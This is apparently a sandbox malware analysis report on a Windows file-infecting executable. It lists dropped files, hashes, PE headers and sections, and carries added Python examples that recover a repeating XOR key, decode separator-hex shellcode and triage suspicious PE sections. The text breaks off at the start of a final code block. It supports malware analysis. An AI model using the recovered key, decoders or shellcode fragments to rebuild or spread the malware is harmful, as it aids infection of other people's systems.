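The preview of the 288768-byte "data" drop above is one 24-character string, FNSBTWCCTGHE7ROQIPNLY106, repeated end to end. That is what repeating-key XOR leaves wherever the plaintext is zero, and a PE has a lot of zero padding behind its DOS header and section table. The opening bytes of the preview bear this out: rotate the repeat so that file offset 0 falls on T (TGHE7ROQIPNLY106FNSBTWCC), XOR a stock DOS header (4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 ...) and the standard MSVC stub (0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 "This program cannot be run in DOS mode.") with it, draw non-printable bytes as dots, and the result is exactly the preview's ...E4ROQMPNL..06.NSBTWCC.GHE7ROQIPNLY106FNSBTWCCTGHE7ROQIPNL.106HQ.LT.J.u.I..s.9 #n<+^WD'#s!59-, byte for byte. The key value is therefore an inference drawn from the page, not something the report states, and should be confirmed on the file. The 7.996 entropy and Encrypted: true describe the bulk of the file (XOR leaves a packed body as random as it was); the header padding is where the key leaks. The block below is an added example, not code from the report or from the sample: it recovers a repeating XOR key from such a run on a constructed buffer (stock DOS header and stub, a fake PE header, zero padding to 0x400 and a pseudo-random body, XORed with the inferred key), reproduces the preview rendering, handles padding that was 0xFF or 0xCC instead of zero, and computes the 8-bit entropy shown in the "Entropy (8bit)" rows.

```python
import math
import random
import struct
from collections import Counter
from itertools import cycle
from typing import Optional, Tuple

# Key inferred from the report's preview: the visible 24-character repeat, rotated so
# that index 0 lines up with file offset 0. An inference from the page, not a value
# the report states; confirm it on the file before relying on it.
INFERRED_KEY = b"TGHE7ROQIPNLY106FNSBTWCC"


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the 'Entropy (8bit)' figure in the rows above."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def render_preview(data: bytes) -> str:
    """Printable ASCII as itself, every other byte as '.', like the report's Preview rows."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def find_repeating_key(data: bytes, min_period: int = 2, max_period: int = 64,
                       min_run: int = 256) -> Optional[bytes]:
    """Recover a repeating XOR key from the longest run where data[i] == data[i + p].

    A run of constant plaintext (the zero padding behind a PE header) leaves exactly
    that pattern. The smallest period that explains a run of at least min_run bytes
    (and at least two periods) is taken as the key length.
    """
    for p in range(min_period, max_period + 1):
        run = best_len = best_start = 0
        for i in range(len(data) - p):
            run = run + 1 if data[i] == data[i + p] else 0
            if run > best_len:
                best_len, best_start = run, i - run + 1
        if best_len >= max(min_run, 2 * p):
            # Take one period from inside the run (one period past its start, so a
            # coincidental match just before it cannot leak in) and rotate it so that
            # key[0] corresponds to file offset 0 mod p.
            s = best_start + p
            window = data[s:s + p]
            return bytes(window[(m - s) % p] for m in range(p))
    return None


def recover_pe(data: bytes, fillers: Tuple[int, ...] = (0x00, 0xFF, 0xCC, 0x90)) -> Optional[Tuple[bytes, bytes]]:
    """A constant non-zero filler leaves key XOR filler rather than the key, so each
    candidate is tried and checked by decrypting and looking for the MZ signature."""
    raw = find_repeating_key(data)
    if raw is None:
        return None
    for c in fillers:
        key = bytes(k ^ c for k in raw)
        plain = xor_repeating(data, key)
        if plain.startswith(b"MZ"):
            return key, plain
    return None


def build_sample() -> Tuple[bytes, bytes]:
    """Constructed stand-in for the encrypted drop: a stock DOS header and MSVC stub, a fake
    PE header, zero padding to 0x400 and a pseudo-random body, XORed with INFERRED_KEY.
    Only the header bytes are meant to reproduce the report's preview."""
    dos = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
           b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00" + bytes(34) + struct.pack("<I", 0x80))
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$")
    fake_pe = b"PE\x00\x00\x4c\x01" + bytes(range(0x10, 0x60))      # 86 non-zero 'header' bytes
    rng = random.Random(1588299)
    body = bytes(rng.getrandbits(8) for _ in range(4096))
    plain = (dos + stub).ljust(0x80, b"\x00") + fake_pe
    plain = plain.ljust(0x400, b"\x00") + body
    return plain, xor_repeating(plain, INFERRED_KEY)
```

On the real drop, xor_repeating(data, INFERRED_KEY) should produce an MZ header; if it does not, recover_pe's filler loop covers the case where the visible run came from a 0xFF or 0xCC fill rather than zeros. The e_lfanew value in the constructed header (0x80) is a placeholder: the report's preview shows a dot there, which any usual value reproduces.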

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: data
Category: dropped
Size (bytes): 14596
Entropy (8bit): 7.634261998230472
Encrypted: false
SSDEEP: 384:dTYznwMNeAOPPYLDfvWME/eTk5mUOYHvqmUoiGwfycSV:dAwJV8DfvWkOLHBiGw5C
MD5: EA210CBB3DB8B138FB96C70BFA3F2452
SHA1: 5A9BF057A5CBB0B7A5E59F9B6B139166A38ACE52
SHA-256: 2C964FC828D78F33A0C823FBD610B1BCF74C801A09EDE5E82EEC0572928C423E
SHA-512: 22CDFF953B0732A8855550D2355880EF838844EA47D151149FB462CAC8388AA5B94C8395FF3DB639BE6FA6725FB1F91A156782BCC904E1655E1B878314021F7A
Malicious: false
Reputation: low
                    Preview:EA06..0..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 143378
Entropy (8bit): 2.792495449492762
Encrypted: false
SSDEEP: 192:mNxyGyDZFuil7LDZGMMVQc3GkcVoudfSq5+vLkHVoqW4/qb35mwBgZihJahYDt0m:Y
MD5: 5EEC4E88617FFE9EBD1D4051C4E3DBDE
SHA1: 8FB94D41B8C241F186297A595E94C68CAACB9460
SHA-256: 658153BEC837A54A63CA3F65082A60455C0C58CFD891BECB00467E306F26748C
SHA-512: EEBC8B2326C141B8B4B2C02EBCB64D38357E29F903399974795363D5C0FBCA22B36DB81068B2D5DD2CEA9DB46209D96AFEB5E09592728CE62E0783377944A879
Malicious: false
Reputation: low
                    Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9
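The 143378-byte "ASCII text" drop above (entropy 2.79, a tiny alphabet) is not text. Split its preview on the fixed separator 2d0w and one hex digit is left in every field; read in order the digits are 0x 558bec81eccc020000 5657 b86b000000 66894584 b965000000 66894d86 ba72000000 ..., which is an x86 function prologue (push ebp; mov ebp, esp; sub esp, 0x2CC; push esi; push edi) followed by pairs of mov eax/ecx/edx, imm32 and mov word [ebp-N], reg16 whose immediates spell k, e, r, n, e, l, 3, 2, ., d: the usual wide-character stack-string idiom, here building "kernel32.dll". The drop is therefore hex-encoded 32-bit shellcode with a separator inserted before every nibble, a layer that defeats a plain hex search. The decoder below is an added example, not code from the report or the sample; its input is the preview copied from the row above, so it recovers only the first 99 bytes, and the separator is passed in rather than inferred.

```python
import re
import struct
from typing import Dict, Optional

# Opening characters of the 143378-byte 'ASCII text' drop, copied from its Preview row
# above (an excerpt of the file, not the whole of it).
PREVIEW_EXCERPT = (
    "2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w2"
    "2d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w0"
    "2d0w62d0w62d0w82d0w9"
)

SEPARATOR = "2d0w"   # read off the preview; the example does not infer it


def decode_separated_hex(text: str, separator: str = SEPARATOR) -> bytes:
    """Keep the single character that follows every separator, drop the '0x' prefix,
    and decode the hex. A trailing unpaired digit (a cut-off excerpt) is ignored."""
    digits = "".join(re.findall(re.escape(separator) + r"(.)", text))
    if digits.lower().startswith("0x"):
        digits = digits[2:]
    return bytes.fromhex(digits[: len(digits) // 2 * 2])


def stack_string_immediates(code: bytes) -> str:
    """Collect the characters of a 'mov r32, imm32' stack-string build (opcodes B8..BF,
    immediate a single printable byte) in the order they appear in the code."""
    out, i = [], 0
    while i + 5 <= len(code):
        op, imm = code[i], int.from_bytes(code[i + 1:i + 5], "little")
        if 0xB8 <= op <= 0xBF and 0x20 <= imm < 0x7F:
            out.append(chr(imm))
            i += 5
        else:
            i += 1
    return "".join(out)


def summarize(code: bytes) -> Dict[str, object]:
    """Recognise the standard prologue and report the frame size and any stack string."""
    prologue = code[:3] == b"\x55\x8b\xec"                     # push ebp; mov ebp, esp
    frame: Optional[int] = None
    if code[3:5] == b"\x81\xec":                               # sub esp, imm32
        frame = struct.unpack_from("<I", code, 5)[0]
    return {"prologue": prologue, "frame_size": frame,
            "stack_string": stack_string_immediates(code)}
```

Run over the whole 143378-byte file, decode_separated_hex yields roughly 14 KB of code; the 99 bytes recoverable from the preview already contain the prologue and the start of the kernel32.dll string, which is what the test below checks.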

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: data
Category: dropped
Size (bytes): 12320
Entropy (8bit): 7.986916649895509
Encrypted: false
SSDEEP: 384:TTKYsdO6qxT/dRdfETISZjklFb03G9MD+J:Tp6ordfET5ZjklFbBOD+J
MD5: 38B2A915F3D8A3C452C8CF889D74789F
SHA1: FF4F7A010EF7EA4ADD0D91FD13F674329298EC24
SHA-256: 119AD7ABB337DAF843FAF4E2EEB2B7D3C84261EE798C42EFBF4070B1427A3154
SHA-512: DEE7D7C354C5F0DDD6CCF909BD0116031B1F5C7C29A2DACA8E68E999588B84FBFA25D388061BC63789C4F6A649CABC09AD648B7862CFF68F91EBF0521262EB21
Malicious: false
                    Preview:|.Sr.Y.v.$.....#y#..W.v..K.8......D0S....bx...n.ct....+...t.);...'.....5....8A.....:oJb_..44A.4.]. ....E.T>....{Gp..[......N.`.z)&!.......S....eU.............X....P."....L.9......L....._B/.x.thHczk...d.-.ip|m~..q>...M...G .^....J....d....[..V.}.....b...dy.....w..$..!.i....@m.`...\x..~..B.....&D...b...84;w.Y.....2,..y...a..r..0.....yUz.X9{.y..=B=..~~.1.2..-....Z.j-N....._.....w......i.].\....8.......&....~Z!3....ph.~.$.sZ2.......q...i...6h.5.s.Sf~..kK2w.....Pn.bM.....p....a..!....u..?>Z\..........M..r.3H."...(..<|Z..JhP4#rY.....9..O.o.#..f8M..v..=v&..9....>,.>|M.d.0.F..1/....[{. .aO....1.wxY.e ....A.!....P.6Sz!c.A."L.m."dF..6.[..,0.........c...._x....Z....b.....*6JXpx.e.nT...?..B.Es...N%9_.L.m..*. =..+.]....:......Gt.....0f..c......\.!...z... ..{.....".......y.-1..)b0.w..BM.a~......ST..O....L.-q.......\p...\.......hf]..%.4]2l7..7@.jX..q:.<..O5zl..e(..zQO.D..|.n...~3..9..,.6.....-..H..]`...,.H"*UB.-}....s.3i>\.... }$'.K..8jV...J[.B..l.[...8..Rb..i..'.

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 1348608
Entropy (8bit): 7.251549984092639
Encrypted: false
SSDEEP: 24576:5QW4qoNUgslKNX0Ip0MgHCpoMBOuZVg9N9JMlDlfjRiVuVsWt5MJMs:5QW9BKNX0IPgiKMBOujgFIDRRAubt5M
MD5: 04218364223ED3D355D0195140331BD0
SHA1: 41093B988F7A349B5C5CF9659268C794C1528C44
SHA-256: 47F32A26BCA35873C30A9AF5E6193AD2C09C3D7736EC0BB92C40768109DC1951
SHA-512: D252908C9A179DD90CCBED1B820AB4CD47F886A5E37E9081DE776B01C9585AB826D1A565DA49BCC92314710E80506BFB735F241A2DDB764E5CE5391A25CA6F93
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: modified
Size (bytes): 1592832
Entropy (8bit): 4.174404050329403
Encrypted: false
SSDEEP: 24576:g2G7AbHjkiVg9N9JMlDlfjRiVuVsWt5MJMs:g2G7AbHjNgFIDRRAubt5M
MD5: 96DFF145D8558851EB1FD0CBC6AB435E
SHA1: 3A1F6943051A3192C46AC6C8212CA71137D3B220
SHA-256: 22B199FB31575EB3664A953DCB71D0C38F337D0A77672E84AC0A74C1FF1F8C4C
SHA-512: 5E2ADE7AD7CEB32D262A90D1246571B691FEEAEEF8FC60D6D054C8FD4EDDA6C3EF13B6F2059D4A991AA3997B293787DD1C9BF5BB579768AA75322AA51D187723
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................K..... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\LiuUGJK9vH.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1594368
Entropy (8bit): 4.175676290670847
Encrypted: false
SSDEEP: 12288:VEP3RFFV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WFnVg9N9JMlDlfjRiVuVsWt5MJMs
MD5: 01FCE6399A1AC48F9D7931507B2534BB
SHA1: 42DC16CFCB45DBFA915EA7BFF66D2B0A365F7430
SHA-256: 54957CCD8EBE822DFEDBFE06D794610EDF5EC07B725B8CF200AC9D4E5DB293E3
SHA-512: A79D645A2C60514029B4A342DE32F0CBF52C81D94EC2E4A89FD774ED0EF04302F3A884EE3A6018841C62EDA81F8A5568F901F0DF84B05D11D778235F0634C979
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Note: the SSDEEP chunk Vg9N9JMlDlfjRiVuVsWt5MJMs at block size 24576 recurs in the PE32, PE32+ console and "modified" PE32+ executables above, and those files' 49152-block chunk ends in gFIDRRAubt5M exactly as the submitted sample's own does, so all of them share trailing content with LiuUGJK9vH.exe. That is consistent with the "Infects executable files" signature in the overview: existing executables are rewritten to carry data appended from the sample.
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.....................................1.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

Process: C:\Windows\System32\AppVClient.exe
File Type: data
Category: dropped
Size (bytes): 12320
Entropy (8bit): 7.983876684762191
Encrypted: false
SSDEEP: 384:N9wEvaejiV+fMOdbiQxgrjwiV+EhhpgUW6C:N9wEyu5fjzxajlF3LC
MD5: 5D06C092DF742A8D897D149EEEF6042E
SHA1: 68F4C1AC88A26B70BEFA5CBD80750C61303B292C
SHA-256: E09DA206354507A9476B91661B926BEFD1E24E185CEDF088376CCBBF2461B01A
SHA-512: 80C7D18AB3B162E7EA4DCD672A4F2BFFDA2EAE3812E7A868600DF88A757B7654EC2D96AF2F58D1567CA0BA3BEB2F876D183D5BC31872EBD9C109E695A567B368
Malicious: false
                    Preview:m...B.9..f....|..q.FD.......s.UtMS..\>.n|..c..<.K....._#...}..6(.S/..$.&.3A...'.J:....X .|3.&GC....U.up.^..g..v.j...C.]R...}..G.%.1.....<....Q.....S[.>.!`AT.W.I.I.....l.L.B..J.V_,....(.....Y...*.,....~....`.....&..z{.5.Ia..ST.VQ..,.j._=(ed..`.GG.......0."..c?..!R..i.Q.z.]..!.#}.4...*.].]N..<..f...e4.7.2.hk...5@;...:.Q.....{...":..|.1.'......7>P../x...a...e0Et'.......2Z7.-..|}.&.....a...7.X.Bq....8..#.W.!L._1p.....y..<I.]'d.."......Q..eq..*.m.:".x...5...t..m....hwJY..P.t.6n/T'..:.+Z.s..@...a1Rv.9[..v.N....J...k..E.q..n_.b.bi,.k+.../....Y=...A..hd........e)aJ.....fv};8..#.uS.....t.^1..nn.A...}.....n.+,.3...O.8.V.RQ)J.A...y..=D."...rr.A....r|3.....4=_.s.m..."V.W...... .g......7.......[..H.l..j......a..v.q..h..;...h:E...^...y.../S....j.X..A.d$..q^.l-..ol./.JM...^..D.[.^\.......*xa......n.G.X...(.... O...78...Z&....e...4.p.b9.D....V6h.5..[.$...g._b+..'(..B"4.l......T.Z..F.+.|.pY...l..*.i1.W.|,.[...0Z.c..F[(..?`.T.....;......p...iD+./.a.&,\8"

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.505116096201164
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: LiuUGJK9vH.exe
File size: 1'761'792 bytes
MD5: 690a2cbb7f785f6f90a0b510f31d40de
SHA1: 624e1b8b472706e33e7d9b90ac1626153854433f
SHA256: 1273e390eab2f69aa5ed380f296a7cd6c8ff01142367fe5dd76eae5f515947e2
SHA512: 8b36aead66b13820b0d298210edc319e043e2910bb3a7c23f22dfa0a55a535e7f668996e3a57c35b411b04d40cf9d1d7535959cd7be50ce7e84a7651c2f5bfd4
SSDEEP: 49152:Hd0c++OCvkGs9FaXVbf1deFYpgFIDRRAubt5M:9B3vkJ9mbf1deFHUf
TLSH: 9285E02273DDC370CB669173FF6AB7016EBB3C610630B95B2F980D79A960161162D7A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x6756D4C9 [Mon Dec 9 11:30:17 2024 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Note: DLL Characteristics carries only TERMINAL_SERVER_AWARE, so neither DYNAMIC_BASE (ASLR) nor NX_COMPAT is set, and the base-relocation directory listed further down is empty; the image can load only at its preferred base of 0x400000.
                    Instruction
                    call 00007F8354D3494Ah
                    jmp 00007F8354D27714h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F8354D2789Ah
                    cmp edi, eax
                    jc 00007F8354D27BFEh
                    bt dword ptr [004C31FCh], 01h
                    jnc 00007F8354D27899h
                    rep movsb
                    jmp 00007F8354D27BACh
                    cmp ecx, 00000080h
                    jc 00007F8354D27A64h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F8354D278A0h
                    bt dword ptr [004BE324h], 01h
                    jc 00007F8354D27D70h
                    bt dword ptr [004C31FCh], 00000000h
                    jnc 00007F8354D27A3Dh
                    test edi, 00000003h
                    jne 00007F8354D27A4Eh
                    test esi, 00000003h
                    jne 00007F8354D27A2Dh
                    bt edi, 02h
                    jnc 00007F8354D2789Fh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F8354D278A3h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F8354D278F5h
                    bt esi, 03h
                    jnc 00007F8354D27948h
                    Programming Language:
                    • [ASM] VS2013 build 21005
                    • [ C ] VS2013 build 21005
                    • [C++] VS2013 build 21005
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2013 UPD4 build 31101
                    • [RES] VS2013 build 21005
                    • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x57b24 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 3de9cc8884ce5b00bc2079b745b786a7 | False | 0.5728679102422908 | data | 6.676133860974604 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x57b24 | 0x57c00 | 536b3a2dacb66be13de7645ab0e3eb9f | False | 0.9249215411324786 | data | 7.887704577352067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x11f000 | 0x96000 | 0x95000 | 0f4e3d5187d83a5598d2c68e6fef89e8 | False | 0.97575470585151 | data | 7.938033667934618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Note: the .reloc section is 0x95000 raw bytes at entropy 7.94, flagged executable and writable, while the base-relocation directory above is empty (0x0 / 0x0). A genuine relocation table is neither executable nor close to random, so this section is an opaque blob carried under a familiar name, not relocation data. The raw sizes add up to the file size (0x400 of headers + 0x8de00 + 0x2e200 + 0x5200 + 0x57c00 + 0x95000 = 0x1ae200 = 1'761'792), so nothing is appended beyond the section table. The "OpenPGP Public Key" type on .rdata is a libmagic misidentification of ordinary read-only data.
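The data directories and section table above invite three mechanical checks: a section that is both writable and executable, a section whose raw bytes sit at or above 7 bits of entropy, and a .reloc section that the BASERELOC directory does not reference. The following is an added example, not code from the report and not Joe Sandbox's own: a stdlib-only parser for the DOS header, COFF header, data directories and section table, with a triage pass that applies those checks and decodes TimeDateStamp the way the Time Stamp row does. It runs on a constructed PE32 that mimics the table above (a repetitive .text, a pseudo-random RWX .reloc, an empty BASERELOC directory and the report's timestamp 0x6756D4C9); the constants, layout and section contents are the example's own, not the sample's.

```python
import math
import random
import struct
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Tuple

IMAGE_SCN_CNT_CODE = 0x00000020
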